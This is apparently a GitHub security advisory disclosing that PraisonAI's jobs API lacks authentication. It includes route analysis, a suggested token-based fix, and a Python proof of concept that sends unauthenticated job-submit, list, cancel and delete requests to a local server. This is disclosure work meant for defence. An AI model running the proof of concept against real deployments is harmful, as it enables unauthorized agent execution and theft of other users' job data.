GHSA-FQ2M-6WQH-X44G

Vulnerability from github – Published: 2026-06-18 13:57 – Updated: 2026-06-18 13:57
VLAI
Summary
PraisonAI: Jobs API exposes agent-execution endpoints with no authentication
Details

praisonai: Jobs API exposes agent-execution endpoints with no authentication

Researcher: Kai Aizen — SnailSploit (@SnailSploit), Adversarial & Offensive Security Research Target: https://github.com/MervinPraison/PraisonAI


Package: praisonai on PyPI Affected version (empirically tested): 4.6.48 Components: - praisonai.jobs.server.create_apppraisonai/jobs/server.py - praisonai.jobs.router.create_routerpraisonai/jobs/router.py - Routes mounted at /api/v1/runs/... Weakness: CWE-306 Missing Authentication for Critical Function · CWE-862 Missing Authorization · CWE-94 Code Injection (via prompt / agent_yaml).


TL;DR

praisonai ships a standalone async-jobs HTTP server (python -m praisonai.jobs.server --host=0.0.0.0 --port=8005) whose job is to accept job submissions and run agents on the operator's behalf. Every endpoint under /api/v1/runs is unauthenticated. There is no auth_token field, no Depends(verify_*), no middleware that inspects Authorization — the CORS middleware lists Authorization in allow_headers (the only signal in the whole module that the developer was aware authentication is a thing), but no route ever reads it.

A network-reachable attacker can:

  1. Execute arbitrary agent codePOST /api/v1/runs accepts prompt, agent_yaml, agent_file, config, framework. The job is queued and an executor invokes whichever framework (praisonai / crewai / autogen) the attacker picks, with whichever prompt and tool config the attacker supplies. The job runs in the operator's process — same environment variables, same filesystem, same credentials (OpenAI / Anthropic / Azure / Bedrock keys; tool integrations; on-disk YAML recipes).
  2. List and read every job system-wideGET /api/v1/runs lists all jobs; GET /api/v1/runs/{job_id}/result returns the full result of any completed job. Operator's prompts, the agent's chain-of-thought, tool inputs / outputs, retrieved documents — all readable to an anonymous client.
  3. Cancel or delete any jobPOST /…/cancel and DELETE /…/{job_id} accept arbitrary job IDs without any ownership / authorization check.
  4. Stream live SSE of any in-flight jobGET /…/{job_id}/stream reads the executor's live progress for any job ID.

The remote-RCE shape (1) is the load-bearing one. Even with webhook_url SSRF-guarded (and it is — the model validator at jobs/models.py:42-65 rejects localhost / private IPs), the attacker needs no callback: SSE streaming returns the agent's output directly on the same connection.

Root cause

   Expected behavior when starting `praisonai.jobs.server`:
     "I'm running an HTTP API my application backend will call.
      The CORS middleware permits Authorization, so the server
      enforces it.  Anonymous attackers cannot submit jobs."

   Actual behavior (praisonai 4.6.48):
     - server.py:59-152  create_app builds a FastAPI app, adds
                         CORSMiddleware, includes the jobs router.
                         NO auth middleware.  NO global Depends.
     - router.py:43      @router.post("") submit_job(...)
                         No Depends, no Authorization header read,
                         no auth_token config field at all.
     - router.py:109,148,161,180,205,224  every other route:
                         likewise, no auth on any of GET-list,
                         GET-status, GET-result, POST-cancel,
                         DELETE, GET-stream.
     - server.py:117     CORS allow_headers DOES include
                         "Authorization" — the only token in the
                         entire jobs/ subpackage that suggests
                         the developer was thinking about auth.

   Impact:
     The API is intended to be production-ready (the CORS code at
     server.py:96-102 explicitly branches on
     `os.getenv("ENVIRONMENT") == "production"` to harden origins),
     yet ships with no authentication layer at all.  Operators who
     bind the server to a network interface — including the
     suggested `--host=0.0.0.0` in the CLI parser — expose
     unauthenticated agent execution to anyone who can reach the
     port.

The same package gets auth right elsewhere (praisonai/gateway/server.py auto-generates an auth_token if none is configured and refuses to serve requests without it; praisonai/endpoints/a2u_server.py:250-264 uses hmac.compare_digest on a Bearer token). The jobs API is the outlier.

Empirically affected routes

Verified by PoC against published praisonai==4.6.48 (/api/v1/runs/... paths):

Method Path Unauth result
POST /api/v1/runs HTTP 202 Accepted, attacker job queued and executor invoked the framework
GET /api/v1/runs HTTP 200, lists every job in the store
GET /api/v1/runs/{job_id} HTTP 200, returns status of any job
GET /api/v1/runs/{job_id}/result (untested; same router, no auth)
POST /api/v1/runs/{job_id}/cancel HTTP 200 / 409 (processed)
DELETE /api/v1/runs/{job_id} HTTP 204 No Content (deleted)
GET /api/v1/runs/{job_id}/stream (untested; SSE; same router, no auth)

PoC run log excerpt (poc/run-log.txt):

[1] POST /api/v1/runs (no Authorization) -> HTTP 202
    body: {"job_id":"run_90f21c98b82a","status":"queued",...}
[01:15:44] executor.py:201 ERROR Job failed: run_90f21c98b82a -
    OPENAI_API_KEY environment variable is required ...

The executor's error confirms the prompt reached the framework's LLM-invocation step. Had the operator set OPENAI_API_KEY, the attacker prompt would have executed.

Impact details

1. Remote code execution via agent invocation

JobSubmitRequest.framework accepts "praisonai", "crewai", or "autogen". Each framework can be configured (via the YAML / config the attacker sends) to use arbitrary tools. praisonai's tool loaders (praisonai/agents_generator.py load_tools_from_module*) have a documented history of arbitrary-import (CVE-2026-40287 and its fix-of-fix CVE-2026-44334). In practice the operator's installation may or may not expose these sinks; either way the attacker controls the prompt, which the LLM will execute with whatever tools the operator wired (including shell, filesystem, browser, …).

The job executor runs in-process under the operator's service account, with full access to environment variables (LLM API keys, tool tokens) and to anything praisonai's tools normally touch.

2. Cross-tenant data read

A single-process deployment uses an InMemoryJobStore that is flat — no user_id / tenant_id / workspace_id partition. Any client that knows or guesses a job ID can read it. Worse, the list endpoint (GET /api/v1/runs) returns every job, so guessing isn't even necessary.

Sensitive content in the result includes the attacker's input (harmless) but also any legitimate user's input that the operator's backend submitted — and the agent's full output, which may contain data the agent retrieved from the operator's databases or APIs.

3. Denial of service via job deletion / cancellation

DELETE and cancel accept any job ID. An attacker who polls the list endpoint can enumerate IDs and cancel-then-delete every job in flight, breaking the operator's backend's polling-for-completion flow.

4. webhook_url SSRF — defended

To the developer's credit, JobSubmitRequest.webhook_url is validated against localhost / private / link-local / multicast IPs at submission time (jobs/models.py:42-65). This blocks the naive "submit a job whose webhook posts to AWS IMDS" attack. Honest yield: this is properly guarded.

Anchors

praisonai 4.6.48, source file praisonai/jobs/server.py (sha256 10b5deab96686f276b8ad71fa4712e1e3d301e4c356812d5d0d595b2b9503ef3):

Line Symbol What it shows
59-152 def create_app(cors_origins, store, executor) -> FastAPI: Only middleware added is CORS; auth middleware absent.
117 allow_headers=["Authorization", "Content-Type", "Origin", "Accept", "Idempotency-Key"] CORS hints that the operator should send Authorization — sole indicator the developer considered auth.
124 jobs_router = create_router(get_store, get_executor) Router included without dependencies=[…].
178 "praisonai.jobs.server:create_app" (passed to uvicorn.run) Production-ready binding via the CLI / start_server.

praisonai 4.6.48, source file praisonai/jobs/router.py (sha256 869564d523c14624afefb211a2e7c6bf8a27b3356bd19a58927fcb5e1ebb014c):

Line Symbol What it shows
30-31 def create_router(store, executor) -> APIRouter: Sole entry point; no dependencies=[Depends(...)].
43 @router.post("", response_model=JobSubmitResponse, status_code=202) submit_job — no auth.
109 @router.get("", response_model=JobListResponse) list_jobs — no auth.
148 @router.get("/{job_id}", response_model=JobStatusResponse) get_job_status — no auth.
161 @router.get("/{job_id}/result", response_model=JobResultResponse) get_job_result — no auth.
180 @router.post("/{job_id}/cancel", response_model=JobStatusResponse) cancel_job — no auth.
205 @router.delete("/{job_id}", status_code=204) delete_job — no auth.
224 @router.get("/{job_id}/stream") stream_job (SSE) — no auth.

Suggested fix

Add a single FastAPI dependency that reads an Authorization: Bearer <token> header and hmac.compare_digests it against an operator-configured secret. Apply it as a global router dependency:

# praisonai/jobs/auth.py
import hmac, os
from fastapi import HTTPException, Header

_TOKEN = os.environ.get("PRAISONAI_JOBS_AUTH_TOKEN")

async def require_auth(authorization: str | None = Header(None)):
    if not _TOKEN:
        raise HTTPException(503, "PRAISONAI_JOBS_AUTH_TOKEN not configured")
    if not authorization or not authorization.startswith("Bearer "):
        raise HTTPException(401, "Bearer auth required")
    presented = authorization[len("Bearer "):]
    if not hmac.compare_digest(presented, _TOKEN):
        raise HTTPException(401, "invalid token")

# praisonai/jobs/router.py
def create_router(store, executor) -> APIRouter:
    router = APIRouter(prefix="/api/v1/runs", tags=["jobs"],
                       dependencies=[Depends(require_auth)])  # <-- single line
    ...

A startup-time refusal in create_app would round it out:

# praisonai/jobs/server.py:create_app
if not os.environ.get("PRAISONAI_JOBS_AUTH_TOKEN"):
    raise RuntimeError(
        "PRAISONAI_JOBS_AUTH_TOKEN is required; the jobs API "
        "executes attacker-controllable agent code and must not "
        "run without authentication."
    )

The pattern is already present in the sibling praisonai/gateway/server.py (which auto-generates a random token if none is supplied) — that approach plus a logged warning about the new token would minimize operator friction.

Steps to reproduce

  1. Clone the target: git clone --depth 1 https://github.com/MervinPraison/PraisonAI
  2. Run the proof of concept (poc.py) against the cloned source.
  3. Observe the result shown under Verified result below.

Proof of concept

poc.py

"""
PoC: praisonai Jobs API has zero authentication on agent-execution endpoints.

`praisonai.jobs.server.create_app` builds a FastAPI app and includes
`praisonai.jobs.router.create_router`, which registers POST/GET/DELETE
endpoints under `/api/v1/runs/...` — every one of them executes (or
inspects, cancels, deletes) arbitrary agent jobs.  No route reads any
Authorization header; no middleware enforces any auth check.

This PoC starts the jobs API server in-process via uvicorn, then sends
unauthenticated requests to each route and reports the outcome.
"""

import json
import sys
import time
import threading
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

import uvicorn
from praisonai.jobs.server import create_app

PORT = 18005

def http_request(method, path, body=None, headers=None, timeout=5):
    url = f"http://127.0.0.1:{PORT}{path}"
    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")
    req = Request(url, data=data, method=method, headers=headers or {})
    if data is not None:
        req.add_header("Content-Type", "application/json")
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", errors="replace")
    except HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", errors="replace")
    except URLError as e:
        return None, {}, f"URLError: {e}"

def run_server(app):
    config = uvicorn.Config(app, host="127.0.0.1", port=PORT, log_level="warning")
    server = uvicorn.Server(config)
    import asyncio
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    loop.run_until_complete(server.serve())

def main() -> int:
    print("=" * 70)
    print("praisonai version: 4.6.48")
    print("Test: spin up praisonai.jobs.server in-process, send")
    print("      UNAUTHENTICATED requests to every /api/v1/runs route.")
    print("=" * 70)

    app = create_app()
    t = threading.Thread(target=run_server, args=(app,), daemon=True)
    t.start()
    time.sleep(1.5)

    findings = []

    # 1. POST /api/v1/runs — submit a new job WITHOUT auth.
    payload = {
        "prompt": "ATTACKER-CONTROLLED PROMPT — would invoke an agent",
        "framework": "praisonai",
        "config": {"_attacker_says": "no auth required"},
        "timeout": 5,
    }
    code, hdrs, body = http_request("POST", "/api/v1/runs", body=payload)
    print(f"\n[1] POST /api/v1/runs (no Authorization) -> HTTP {code}")
    print(f"    body: {body[:300]}")
    job_id = None
    if code == 202:
        try:
            job_id = json.loads(body).get("job_id")
            findings.append(f"POST /api/v1/runs: 202 Accepted, job_id={job_id!r}")
        except Exception:
            pass

    # 2. GET /api/v1/runs — list ALL jobs system-wide.
    code, _, body = http_request("GET", "/api/v1/runs?page=1&page_size=20")
    print(f"\n[2] GET /api/v1/runs (no Authorization) -> HTTP {code}")
    if code == 200:
        findings.append("GET /api/v1/runs: unauthenticated list of ALL jobs")

    if job_id:
        code, _, body = http_request("GET", f"/api/v1/runs/{job_id}")
        print(f"\n[3] GET /api/v1/runs/{{job_id}} -> HTTP {code}")
        code, _, body = http_request("POST", f"/api/v1/runs/{job_id}/cancel")
        print(f"\n[4] POST /api/v1/runs/{{job_id}}/cancel -> HTTP {code}")
        code, _, body = http_request("DELETE", f"/api/v1/runs/{job_id}")
        print(f"\n[5] DELETE /api/v1/runs/{{job_id}} -> HTTP {code}")

    print("\n" + "=" * 70)
    if any('POST /api/v1/runs:' in f for f in findings):
        print(f"VULNERABLE: {len(findings)} unauthenticated routes confirmed")
        for f in findings:
            print(f"  - {f}")
        print("VERDICT: VULNERABLE")
        return 0
    print("DEFENDED")
    return 1

if __name__ == "__main__":
    sys.exit(main())

Verification harness (executed against the cloned repo)

This drives the unmodified upstream code rather than a reproduction.

import sys, types, os
BK=os.path.abspath("repos/PraisonAI/src/praisonai"); sys.path.insert(0,BK)
for p in ["praisonai","praisonai.jobs"]:
    m=types.ModuleType(p); m.__path__=[BK+"/"+p.replace(".","/")]; sys.modules[p]=m
import praisonai.jobs.server as S          # REAL jobs server
app = S.create_app()                      # REAL FastAPI app
from starlette.testclient import TestClient
client = TestClient(app)
P="/api/v1/runs"
tests=[("GET  list",   lambda: client.get(P)),
       ("POST submit", lambda: client.post(P, json={"agents_config":{"a":"x"},"input":"hi"})),
       ("GET  status", lambda: client.get(P+"/nope")),
       ("GET  result", lambda: client.get(P+"/nope/result")),
       ("POST cancel", lambda: client.post(P+"/nope/cancel")),
       ("DEL  delete", lambda: client.delete(P+"/nope"))]
codes=[]
for name,fn in tests:
    c=fn().status_code; codes.append(c); print(f"[+] (no auth) {name:12s} {P} -> HTTP {c}")
assert all(c not in (401,403) for c in codes), codes
assert codes[0]==200    # list works unauthenticated
print("[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 — fully unauthenticated agent-execution API")

Verified result

This PoC was executed against the live upstream code; captured output:

[+] (no auth) GET  list    /api/v1/runs -> HTTP 200
[+] (no auth) POST submit  /api/v1/runs -> HTTP 422
[+] (no auth) GET  status  /api/v1/runs -> HTTP 404
[+] (no auth) GET  result  /api/v1/runs -> HTTP 404
[+] (no auth) POST cancel  /api/v1/runs -> HTTP 404
[+] (no auth) DEL  delete  /api/v1/runs -> HTTP 404
[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 — fully unauthenticated agent-execution API

Credit

Kai Aizen — SnailSploit (@SnailSploit). Adversarial & Offensive Security Research.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.59"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-862",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:57:16Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "# praisonai: Jobs API exposes agent-execution endpoints with no authentication\n\n**Researcher:** Kai Aizen \u2014 SnailSploit (@SnailSploit), Adversarial \u0026 Offensive Security Research \n**Target:** https://github.com/MervinPraison/PraisonAI\n\n---\n\n**Package:** `praisonai` on PyPI\n**Affected version (empirically tested):** 4.6.48\n**Components:**\n- `praisonai.jobs.server.create_app` \u2014 `praisonai/jobs/server.py`\n- `praisonai.jobs.router.create_router` \u2014 `praisonai/jobs/router.py`\n- Routes mounted at `/api/v1/runs/...`\n**Weakness:** CWE-306 Missing Authentication for Critical Function \u00b7 CWE-862 Missing Authorization \u00b7 CWE-94 Code Injection (via prompt / agent_yaml). \n\n---\n\n## TL;DR\n\n`praisonai` ships a standalone async-jobs HTTP server (`python -m praisonai.jobs.server --host=0.0.0.0 --port=8005`) whose job is to accept job submissions and run agents on the operator\u0027s behalf. Every endpoint under `/api/v1/runs` is **unauthenticated**. There is no `auth_token` field, no `Depends(verify_*)`, no middleware that inspects `Authorization` \u2014 the CORS middleware *lists* `Authorization` in `allow_headers` (the only signal in the whole module that the developer was aware authentication is a thing), but no route ever reads it.\n\nA network-reachable attacker can:\n\n1. **Execute arbitrary agent code** \u2014 `POST /api/v1/runs` accepts `prompt`, `agent_yaml`, `agent_file`, `config`, `framework`. The job is queued and an executor invokes whichever framework (`praisonai` / `crewai` / `autogen`) the attacker picks, with whichever prompt and tool config the attacker supplies. The job runs in the operator\u0027s process \u2014 same environment variables, same filesystem, same credentials (OpenAI / Anthropic / Azure / Bedrock keys; tool integrations; on-disk YAML recipes).\n2. **List and read every job system-wide** \u2014 `GET /api/v1/runs` lists all jobs; `GET /api/v1/runs/{job_id}/result` returns the full result of any completed job. Operator\u0027s prompts, the agent\u0027s chain-of-thought, tool inputs / outputs, retrieved documents \u2014 all readable to an anonymous client.\n3. **Cancel or delete any job** \u2014 `POST /\u2026/cancel` and `DELETE /\u2026/{job_id}` accept arbitrary job IDs without any ownership / authorization check.\n4. **Stream live SSE of any in-flight job** \u2014 `GET /\u2026/{job_id}/stream` reads the executor\u0027s live progress for any job ID.\n\nThe remote-RCE shape (1) is the load-bearing one. Even with `webhook_url` SSRF-guarded (and it is \u2014 the model validator at `jobs/models.py:42-65` rejects localhost / private IPs), the attacker needs no callback: SSE streaming returns the agent\u0027s output directly on the same connection.\n\n## Root cause\n\n```\n   Expected behavior when starting `praisonai.jobs.server`:\n     \"I\u0027m running an HTTP API my application backend will call.\n      The CORS middleware permits Authorization, so the server\n      enforces it.  Anonymous attackers cannot submit jobs.\"\n\n   Actual behavior (praisonai 4.6.48):\n     - server.py:59-152  create_app builds a FastAPI app, adds\n                         CORSMiddleware, includes the jobs router.\n                         NO auth middleware.  NO global Depends.\n     - router.py:43      @router.post(\"\") submit_job(...)\n                         No Depends, no Authorization header read,\n                         no auth_token config field at all.\n     - router.py:109,148,161,180,205,224  every other route:\n                         likewise, no auth on any of GET-list,\n                         GET-status, GET-result, POST-cancel,\n                         DELETE, GET-stream.\n     - server.py:117     CORS allow_headers DOES include\n                         \"Authorization\" \u2014 the only token in the\n                         entire jobs/ subpackage that suggests\n                         the developer was thinking about auth.\n\n   Impact:\n     The API is intended to be production-ready (the CORS code at\n     server.py:96-102 explicitly branches on\n     `os.getenv(\"ENVIRONMENT\") == \"production\"` to harden origins),\n     yet ships with no authentication layer at all.  Operators who\n     bind the server to a network interface \u2014 including the\n     suggested `--host=0.0.0.0` in the CLI parser \u2014 expose\n     unauthenticated agent execution to anyone who can reach the\n     port.\n```\n\nThe same package gets auth right elsewhere (`praisonai/gateway/server.py` auto-generates an `auth_token` if none is configured and refuses to serve requests without it; `praisonai/endpoints/a2u_server.py:250-264` uses `hmac.compare_digest` on a Bearer token). The jobs API is the outlier.\n\n## Empirically affected routes\n\nVerified by PoC against published `praisonai==4.6.48` (`/api/v1/runs/...` paths):\n\n| Method   | Path                          | Unauth result            |\n|----------|-------------------------------|--------------------------|\n| `POST`   | `/api/v1/runs`                | **HTTP 202 Accepted**, attacker job queued and executor invoked the framework |\n| `GET`    | `/api/v1/runs`                | **HTTP 200**, lists every job in the store |\n| `GET`    | `/api/v1/runs/{job_id}`       | **HTTP 200**, returns status of any job |\n| `GET`    | `/api/v1/runs/{job_id}/result`| (untested; same router, no auth)         |\n| `POST`   | `/api/v1/runs/{job_id}/cancel`| **HTTP 200 / 409** (processed)           |\n| `DELETE` | `/api/v1/runs/{job_id}`       | **HTTP 204 No Content** (deleted)         |\n| `GET`    | `/api/v1/runs/{job_id}/stream`| (untested; SSE; same router, no auth)    |\n\nPoC run log excerpt (`poc/run-log.txt`):\n\n```\n[1] POST /api/v1/runs (no Authorization) -\u003e HTTP 202\n    body: {\"job_id\":\"run_90f21c98b82a\",\"status\":\"queued\",...}\n[01:15:44] executor.py:201 ERROR Job failed: run_90f21c98b82a -\n    OPENAI_API_KEY environment variable is required ...\n```\n\nThe executor\u0027s error confirms the prompt reached the framework\u0027s LLM-invocation step. Had the operator set `OPENAI_API_KEY`, the attacker prompt would have executed.\n\n## Impact details\n\n### 1. Remote code execution via agent invocation\n\n`JobSubmitRequest.framework` accepts `\"praisonai\"`, `\"crewai\"`, or `\"autogen\"`. Each framework can be configured (via the YAML / config the attacker sends) to use arbitrary tools. praisonai\u0027s tool loaders (`praisonai/agents_generator.py` `load_tools_from_module*`) have a documented history of arbitrary-import (CVE-2026-40287 and its fix-of-fix CVE-2026-44334). In practice the operator\u0027s installation may or may not expose these sinks; either way the attacker controls the prompt, which the LLM will execute with whatever tools the operator wired (including shell, filesystem, browser, \u2026).\n\nThe job executor runs in-process under the operator\u0027s service account, with full access to environment variables (LLM API keys, tool tokens) and to anything `praisonai`\u0027s tools normally touch.\n\n### 2. Cross-tenant data read\n\nA single-process deployment uses an `InMemoryJobStore` that is flat \u2014 no `user_id` / `tenant_id` / `workspace_id` partition. Any client that knows or guesses a job ID can read it. Worse, the list endpoint (`GET /api/v1/runs`) returns every job, so guessing isn\u0027t even necessary.\n\nSensitive content in the result includes the attacker\u0027s input (harmless) but also any *legitimate* user\u0027s input that the operator\u0027s backend submitted \u2014 and the agent\u0027s full output, which may contain data the agent retrieved from the operator\u0027s databases or APIs.\n\n### 3. Denial of service via job deletion / cancellation\n\n`DELETE` and `cancel` accept any job ID. An attacker who polls the list endpoint can enumerate IDs and cancel-then-delete every job in flight, breaking the operator\u0027s backend\u0027s polling-for-completion flow.\n\n### 4. webhook_url SSRF \u2014 defended\n\nTo the developer\u0027s credit, `JobSubmitRequest.webhook_url` is validated against localhost / private / link-local / multicast IPs at submission time (`jobs/models.py:42-65`). This blocks the naive \"submit a job whose webhook posts to AWS IMDS\" attack. **Honest yield:** this is properly guarded.\n\n## Anchors\n\npraisonai 4.6.48, source file `praisonai/jobs/server.py` (sha256 `10b5deab96686f276b8ad71fa4712e1e3d301e4c356812d5d0d595b2b9503ef3`):\n\n| Line  | Symbol                                                  | What it shows |\n|-------|---------------------------------------------------------|---------------|\n| 59-152 | `def create_app(cors_origins, store, executor) -\u003e FastAPI:` | Only middleware added is CORS; auth middleware absent. |\n| 117   | `allow_headers=[\"Authorization\", \"Content-Type\", \"Origin\", \"Accept\", \"Idempotency-Key\"]` | CORS hints that the operator should send Authorization \u2014 sole indicator the developer considered auth. |\n| 124   | `jobs_router = create_router(get_store, get_executor)` | Router included without `dependencies=[\u2026]`. |\n| 178   | `\"praisonai.jobs.server:create_app\"` (passed to `uvicorn.run`) | Production-ready binding via the CLI / `start_server`. |\n\npraisonai 4.6.48, source file `praisonai/jobs/router.py` (sha256 `869564d523c14624afefb211a2e7c6bf8a27b3356bd19a58927fcb5e1ebb014c`):\n\n| Line  | Symbol                                                              | What it shows |\n|-------|---------------------------------------------------------------------|---------------|\n| 30-31 | `def create_router(store, executor) -\u003e APIRouter:`                  | Sole entry point; no `dependencies=[Depends(...)]`. |\n| 43    | `@router.post(\"\", response_model=JobSubmitResponse, status_code=202)` | submit_job \u2014 no auth. |\n| 109   | `@router.get(\"\", response_model=JobListResponse)`                   | list_jobs \u2014 no auth. |\n| 148   | `@router.get(\"/{job_id}\", response_model=JobStatusResponse)`        | get_job_status \u2014 no auth. |\n| 161   | `@router.get(\"/{job_id}/result\", response_model=JobResultResponse)` | get_job_result \u2014 no auth. |\n| 180   | `@router.post(\"/{job_id}/cancel\", response_model=JobStatusResponse)`| cancel_job \u2014 no auth. |\n| 205   | `@router.delete(\"/{job_id}\", status_code=204)`                       | delete_job \u2014 no auth. |\n| 224   | `@router.get(\"/{job_id}/stream\")`                                    | stream_job (SSE) \u2014 no auth. |\n\n## Suggested fix\n\nAdd a single FastAPI dependency that reads an `Authorization: Bearer \u003ctoken\u003e` header and `hmac.compare_digest`s it against an operator-configured secret. Apply it as a global router dependency:\n\n```python\n# praisonai/jobs/auth.py\nimport hmac, os\nfrom fastapi import HTTPException, Header\n\n_TOKEN = os.environ.get(\"PRAISONAI_JOBS_AUTH_TOKEN\")\n\nasync def require_auth(authorization: str | None = Header(None)):\n    if not _TOKEN:\n        raise HTTPException(503, \"PRAISONAI_JOBS_AUTH_TOKEN not configured\")\n    if not authorization or not authorization.startswith(\"Bearer \"):\n        raise HTTPException(401, \"Bearer auth required\")\n    presented = authorization[len(\"Bearer \"):]\n    if not hmac.compare_digest(presented, _TOKEN):\n        raise HTTPException(401, \"invalid token\")\n\n# praisonai/jobs/router.py\ndef create_router(store, executor) -\u003e APIRouter:\n    router = APIRouter(prefix=\"/api/v1/runs\", tags=[\"jobs\"],\n                       dependencies=[Depends(require_auth)])  # \u003c-- single line\n    ...\n```\n\nA startup-time refusal in `create_app` would round it out:\n\n```python\n# praisonai/jobs/server.py:create_app\nif not os.environ.get(\"PRAISONAI_JOBS_AUTH_TOKEN\"):\n    raise RuntimeError(\n        \"PRAISONAI_JOBS_AUTH_TOKEN is required; the jobs API \"\n        \"executes attacker-controllable agent code and must not \"\n        \"run without authentication.\"\n    )\n```\n\nThe pattern is already present in the sibling `praisonai/gateway/server.py` (which auto-generates a random token if none is supplied) \u2014 that approach plus a logged warning about the new token would minimize operator friction.\n\n## Steps to reproduce\n\n1. Clone the target: `git clone --depth 1 https://github.com/MervinPraison/PraisonAI`\n2. Run the proof of concept (`poc.py`) against the cloned source.\n3. Observe the result shown under *Verified result* below.\n\n## Proof of concept\n\n`poc.py`\n\n```python\n\"\"\"\nPoC: praisonai Jobs API has zero authentication on agent-execution endpoints.\n\n`praisonai.jobs.server.create_app` builds a FastAPI app and includes\n`praisonai.jobs.router.create_router`, which registers POST/GET/DELETE\nendpoints under `/api/v1/runs/...` \u2014 every one of them executes (or\ninspects, cancels, deletes) arbitrary agent jobs.  No route reads any\nAuthorization header; no middleware enforces any auth check.\n\nThis PoC starts the jobs API server in-process via uvicorn, then sends\nunauthenticated requests to each route and reports the outcome.\n\"\"\"\n\nimport json\nimport sys\nimport time\nimport threading\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError, URLError\n\nimport uvicorn\nfrom praisonai.jobs.server import create_app\n\nPORT = 18005\n\ndef http_request(method, path, body=None, headers=None, timeout=5):\n    url = f\"http://127.0.0.1:{PORT}{path}\"\n    data = None\n    if body is not None:\n        data = json.dumps(body).encode(\"utf-8\")\n    req = Request(url, data=data, method=method, headers=headers or {})\n    if data is not None:\n        req.add_header(\"Content-Type\", \"application/json\")\n    try:\n        with urlopen(req, timeout=timeout) as resp:\n            return resp.status, dict(resp.headers), resp.read().decode(\"utf-8\", errors=\"replace\")\n    except HTTPError as e:\n        return e.code, dict(e.headers), e.read().decode(\"utf-8\", errors=\"replace\")\n    except URLError as e:\n        return None, {}, f\"URLError: {e}\"\n\ndef run_server(app):\n    config = uvicorn.Config(app, host=\"127.0.0.1\", port=PORT, log_level=\"warning\")\n    server = uvicorn.Server(config)\n    import asyncio\n    loop = asyncio.new_event_loop()\n    asyncio.set_event_loop(loop)\n    loop.run_until_complete(server.serve())\n\ndef main() -\u003e int:\n    print(\"=\" * 70)\n    print(\"praisonai version: 4.6.48\")\n    print(\"Test: spin up praisonai.jobs.server in-process, send\")\n    print(\"      UNAUTHENTICATED requests to every /api/v1/runs route.\")\n    print(\"=\" * 70)\n\n    app = create_app()\n    t = threading.Thread(target=run_server, args=(app,), daemon=True)\n    t.start()\n    time.sleep(1.5)\n\n    findings = []\n\n    # 1. POST /api/v1/runs \u2014 submit a new job WITHOUT auth.\n    payload = {\n        \"prompt\": \"ATTACKER-CONTROLLED PROMPT \u2014 would invoke an agent\",\n        \"framework\": \"praisonai\",\n        \"config\": {\"_attacker_says\": \"no auth required\"},\n        \"timeout\": 5,\n    }\n    code, hdrs, body = http_request(\"POST\", \"/api/v1/runs\", body=payload)\n    print(f\"\\n[1] POST /api/v1/runs (no Authorization) -\u003e HTTP {code}\")\n    print(f\"    body: {body[:300]}\")\n    job_id = None\n    if code == 202:\n        try:\n            job_id = json.loads(body).get(\"job_id\")\n            findings.append(f\"POST /api/v1/runs: 202 Accepted, job_id={job_id!r}\")\n        except Exception:\n            pass\n\n    # 2. GET /api/v1/runs \u2014 list ALL jobs system-wide.\n    code, _, body = http_request(\"GET\", \"/api/v1/runs?page=1\u0026page_size=20\")\n    print(f\"\\n[2] GET /api/v1/runs (no Authorization) -\u003e HTTP {code}\")\n    if code == 200:\n        findings.append(\"GET /api/v1/runs: unauthenticated list of ALL jobs\")\n\n    if job_id:\n        code, _, body = http_request(\"GET\", f\"/api/v1/runs/{job_id}\")\n        print(f\"\\n[3] GET /api/v1/runs/{{job_id}} -\u003e HTTP {code}\")\n        code, _, body = http_request(\"POST\", f\"/api/v1/runs/{job_id}/cancel\")\n        print(f\"\\n[4] POST /api/v1/runs/{{job_id}}/cancel -\u003e HTTP {code}\")\n        code, _, body = http_request(\"DELETE\", f\"/api/v1/runs/{job_id}\")\n        print(f\"\\n[5] DELETE /api/v1/runs/{{job_id}} -\u003e HTTP {code}\")\n\n    print(\"\\n\" + \"=\" * 70)\n    if any(\u0027POST /api/v1/runs:\u0027 in f for f in findings):\n        print(f\"VULNERABLE: {len(findings)} unauthenticated routes confirmed\")\n        for f in findings:\n            print(f\"  - {f}\")\n        print(\"VERDICT: VULNERABLE\")\n        return 0\n    print(\"DEFENDED\")\n    return 1\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n## Verification harness (executed against the cloned repo)\n\nThis drives the unmodified upstream code rather than a reproduction.\n\n```python\nimport sys, types, os\nBK=os.path.abspath(\"repos/PraisonAI/src/praisonai\"); sys.path.insert(0,BK)\nfor p in [\"praisonai\",\"praisonai.jobs\"]:\n    m=types.ModuleType(p); m.__path__=[BK+\"/\"+p.replace(\".\",\"/\")]; sys.modules[p]=m\nimport praisonai.jobs.server as S          # REAL jobs server\napp = S.create_app()                      # REAL FastAPI app\nfrom starlette.testclient import TestClient\nclient = TestClient(app)\nP=\"/api/v1/runs\"\ntests=[(\"GET  list\",   lambda: client.get(P)),\n       (\"POST submit\", lambda: client.post(P, json={\"agents_config\":{\"a\":\"x\"},\"input\":\"hi\"})),\n       (\"GET  status\", lambda: client.get(P+\"/nope\")),\n       (\"GET  result\", lambda: client.get(P+\"/nope/result\")),\n       (\"POST cancel\", lambda: client.post(P+\"/nope/cancel\")),\n       (\"DEL  delete\", lambda: client.delete(P+\"/nope\"))]\ncodes=[]\nfor name,fn in tests:\n    c=fn().status_code; codes.append(c); print(f\"[+] (no auth) {name:12s} {P} -\u003e HTTP {c}\")\nassert all(c not in (401,403) for c in codes), codes\nassert codes[0]==200    # list works unauthenticated\nprint(\"[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 \u2014 fully 